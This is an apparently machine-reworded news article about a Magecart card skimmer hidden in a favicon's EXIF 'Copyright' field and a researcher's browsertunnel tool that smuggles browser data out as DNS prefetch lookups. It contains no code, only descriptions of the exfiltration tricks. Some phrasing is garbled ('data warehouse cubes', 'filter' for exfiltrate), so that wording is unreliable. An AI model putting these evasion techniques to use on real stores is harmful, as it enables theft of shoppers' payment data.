In an innovative hacking campaign, hackers are hiding malicious code implants in image file metadata to secretly steal bank card information from visitors.

“We found stealth code within the metadata of an image file (a form of steganography), and surreptitiously uploaded by compromised online stores,” the Malwarebytes researchers said.

“This scheme would not be complete without another interesting variation to extract data from stolen credit cards. Once again, criminals used the disguise of an image file to collect their loot.

The evolutionary tactic of the operation, widely known as web skimming or Magecart attack, occurs when attackers find different ways to inject JavaScript code, including misconfigured AWS S3 data warehouse cubes and exploit content security policy to transmit data to a Google Analytics account under your control.

The use of steganography techniques generally works by inserting malicious code into a compromised website, which surreptitiously collects and sends user-entered data to a hacker’s server, giving you access to buyers’ payment information.

In this weeklong campaign, the cyber security company discovered that the skimmer was not only discovered in an online store running the WooCommerce WordPress plugin, but that it was contained in the EXIF ​​(Interchangeable Image File Format) metadata of a favicon for a suspicious domain (cddn.site).

Each image is embedded with information about the image itself, such as the manufacturer and model of the camera, date and time the photo was taken, location, resolution, and camera settings, among other details.

Using this EXIF ​​data, the hackers executed a JavaScript snippet that was hidden in the “Copyright” field of the favicon image.

“As with other skimmers, this one also captures the content of input fields where online shoppers enter their name, billing address, and credit card details,” the researchers said.

In addition to encoding the captured information using Base64 format and inverting the output string, the stolen data is transmitted in the form of an image file to hide the exfiltration process.

Claiming that the operation could be the work of Magecart Group 9, Malwarebytes said that the JavaScript code for the skimmer is obfuscated with the WiseLoop PHP JS Obfuscator library.

This is not the first time that Magecart groups have used images as attack vectors to compromise e-commerce websites. In May, it was observed that different hacked websites loaded a malicious favicon on their payment web pages and then replaced legitimate online payment forms with a fraudulent substitute that stole card data.

Abuse of DNS protocol to filter browser data
In a separate technique demonstrated by Jessie Li, she demonstrates that it is possible to steal data from the browser by taking advantage of dns-prefetch, a latency reduction method used to resolve DNS lookups in cross-origin domains before requesting resources.

Called “browsertunnel”, the open source software consists of a server that decodes the messages sent by the tool and a client-side JavaScript library to encode and transmit the messages.

The messages themselves are arbitrary strings encoded in a subdomain of the top domain that the browser is resolving. The tool then listens for DNS queries, collects the incoming messages, and decodes them to extract the relevant data.

In other words, browsertunnel can be used to accumulate confidential information as users perform specific actions on a web page and subsequently filter them to a server disguising it as DNS traffic.

“DNS traffic does not appear in browser debugging tools, is not blocked by a page’s Content Security Policy (CSP), and is often not inspected by firewalls or corporate proxies, making it an ideal medium for data smuggling in restricted scenarios, “said the researcher.

Write Your Comments

Recent Posts

Tags